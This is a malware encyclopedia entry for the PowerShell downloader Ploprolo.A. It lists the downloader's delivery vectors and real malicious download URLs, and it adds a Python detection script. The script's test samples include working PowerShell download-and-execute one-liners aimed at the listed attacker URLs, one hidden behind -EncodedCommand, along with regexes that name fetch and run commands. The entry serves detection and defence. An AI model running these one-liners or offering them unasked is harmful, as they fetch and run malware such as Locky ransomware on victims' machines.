TrojanDownloader:PowerShell/Ploprolo.A
First posted on 19 October 2016.
Source: Microsoft
Aliases:
There are no other names known for TrojanDownloader:PowerShell/Ploprolo.A.
Explanation:
Installation
This threat is a detection for a malicious PowerShell script. When executed, it downloads and runs other malware on the system.
The malicious PowerShell script is usually embedded in other files such as .LNK, .CHM, .BAT, .PDF and .PPTX, and can arrive on your PC as an attachment to a spam email. Screenshots of sample spam emails accompanied the original entry but are not reproduced here.
Payload
Connects to a remote host
We have observed the malicious PowerShell script download malicious files from the following URLs:
- 37.48.125.105/bin/gn.exe
- a.pomf.cat/kdwsuj.exe
- csecur.us/pm/mail.exe
- directexe.com/2D2A/bg.exe
- gonzallezbyass.es/adoread.exe
- herbalshapdco.com/cs16.exe
- info-api.ru/xxx/invoice.exe
- opportunityhy.bid/__files__/c.dat
- opportunityhy.bid/1.dat
- preparingjb.bid/user.php?f=1.dat
- slaughterwu.bid/user.php?f=1.dat
- temporaryv.bid/user.php?f=1.dat
- teolds.com/wp-content/plugins/libravatar-replace/scrwin.exe
- upload.ee/download/6191447/083c56c8207a106cfd10/vale.exe
- zippyshare.com/d/8hjAtabL/26263/Server.exe
The downloaded file is then saved to the %TEMP% or %APPDATA% folder and executed from there.
Downloads and installs other malware
We have observed this threat download a variant of Ransom:Win32/Locky and other malware such as Win/Zbot.
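The behaviour described above (fetch a file from a remote URL, drop it under %TEMP% or %APPDATA%, run it) is what a hunting rule over PowerShell script-block logs should look for. The following is an added example, not code from Microsoft or from the original entry: it triages PowerShell command text for the download-and-execute pattern, expands a `-EncodedCommand` argument when one is present (a common way the script body is hidden; the entry itself does not describe encoding), and matches any URLs found against the download list above. The regular expressions, the function names and the four sample command lines are this example's own assumptions and constructions, written to resemble the text that Windows PowerShell script-block logging records.

```python
"""Triage PowerShell command text for a download-and-execute downloader.

Added example (not Microsoft's code). Input samples are constructed to look
like PowerShell script-block text; the URL list is the one from the entry.
"""
import base64
import re
from urllib.parse import urlparse

# Download URLs listed in the entry, scheme-less and lower-cased so a match
# works for http or https and regardless of path case.
IOC_URLS = {u.lower() for u in (
    "37.48.125.105/bin/gn.exe",
    "a.pomf.cat/kdwsuj.exe",
    "csecur.us/pm/mail.exe",
    "directexe.com/2D2A/bg.exe",
    "gonzallezbyass.es/adoread.exe",
    "herbalshapdco.com/cs16.exe",
    "info-api.ru/xxx/invoice.exe",
    "opportunityhy.bid/__files__/c.dat",
    "opportunityhy.bid/1.dat",
    "preparingjb.bid/user.php?f=1.dat",
    "slaughterwu.bid/user.php?f=1.dat",
    "temporaryv.bid/user.php?f=1.dat",
    "teolds.com/wp-content/plugins/libravatar-replace/scrwin.exe",
    "upload.ee/download/6191447/083c56c8207a106cfd10/vale.exe",
    "zippyshare.com/d/8hjAtabL/26263/Server.exe",
)}

# Assumed patterns: the usual PowerShell ways to fetch, to run, and the drop
# folders named in the entry. Tune for your own environment.
DOWNLOAD_RE = re.compile(
    r"\.DownloadFile\(|\.DownloadString\(|\.DownloadData\(|Invoke-WebRequest"
    r"|\biwr\b|\bwget\b|\bcurl\b|Start-BitsTransfer", re.I)
EXEC_RE = re.compile(
    r"Start-Process|\bsaps\b|Invoke-Item|Invoke-Expression|\biex\b"
    r"|&\s*\$|\bcmd(?:\.exe)?\s+/c", re.I)
DROP_RE = re.compile(
    r"\$env:(?:TEMP|TMP|APPDATA)|%(?:TEMP|TMP|APPDATA)%"
    r"|\\AppData\\Roaming\\|\\Temp\\", re.I)
URL_RE = re.compile(r"https?://[^\s'\"<>()]+", re.I)
ENC_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def expand_encoded(text: str) -> str:
    """Append the decoded body of any -EncodedCommand/-enc argument.

    PowerShell expects the argument to be base64 of UTF-16LE text; anything
    that fails to decode that way is left alone rather than guessed at.
    """
    out = text
    for b64 in ENC_RE.findall(text):
        try:
            out += "\n" + base64.b64decode(b64, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            continue
    return out


def strip_scheme(url: str) -> str:
    """Normalise a URL to the scheme-less, lower-cased form used in IOC_URLS."""
    return re.sub(r"^https?://", "", url, flags=re.I).rstrip("/").lower()


def triage(text: str) -> dict:
    """Classify one command line / script block as downloader, suspicious or benign."""
    body = expand_encoded(text)
    urls = URL_RE.findall(body)
    ioc_hits = sorted({u for u in urls if strip_scheme(u) in IOC_URLS})
    download = bool(DOWNLOAD_RE.search(body))
    execute = bool(EXEC_RE.search(body))
    drop_dir = bool(DROP_RE.search(body))
    if ioc_hits or (download and execute):
        verdict = "downloader"      # fetch + run, or a known Ploprolo URL
    elif download and drop_dir:
        verdict = "suspicious"      # fetch into %TEMP%/%APPDATA%, no run seen yet
    else:
        verdict = "benign"
    return {"verdict": verdict, "urls": urls, "ioc_hits": ioc_hits,
            "hosts": sorted({urlparse(u).hostname or "" for u in urls}),
            "download": download, "execute": execute, "drop_dir": drop_dir}


# Constructed samples (not real log data). The third one hides the same
# downloader behind -enc, built here so the base64 is exact.
_INNER = "(New-Object Net.WebClient).DownloadString('http://opportunityhy.bid/1.dat')|iex"
SAMPLES = {
    "ploprolo_plain": ("$w=New-Object Net.WebClient;$p=$env:TEMP+'\\invoice.exe';"
                       "$w.DownloadFile('http://info-api.ru/xxx/invoice.exe',$p);"
                       "Start-Process $p"),
    "admin_download": "Invoke-WebRequest -Uri https://example.com/report.csv "
                      "-OutFile C:\\Reports\\report.csv",
    "ploprolo_encoded": "powershell.exe -NoP -W Hidden -enc "
                        + base64.b64encode(_INNER.encode("utf-16-le")).decode(),
    "admin_listing": "Get-ChildItem $env:APPDATA -Recurse | Measure-Object",
}


def triage_all() -> dict:
    """Return {sample name: verdict} for every constructed sample."""
    return {name: triage(text)["verdict"] for name, text in SAMPLES.items()}


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = triage(text)
        print(f"{name:18} {r['verdict']:10} ioc={r['ioc_hits']}")
```

Two practical notes. The IOC match is on the full path, not the host, because upload.ee and zippyshare.com are general-purpose file hosts and a host-only match would flag legitimate traffic. And a plain download with no execution step is deliberately left as "benign" unless it lands in one of the drop folders the entry names, since administrators fetch files with Invoke-WebRequest all the time; the entry's distinguishing trait is the save-and-run sequence, so that is what the verdict keys on.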
Analysis by Ric Robielos
Last update: 19 October 2016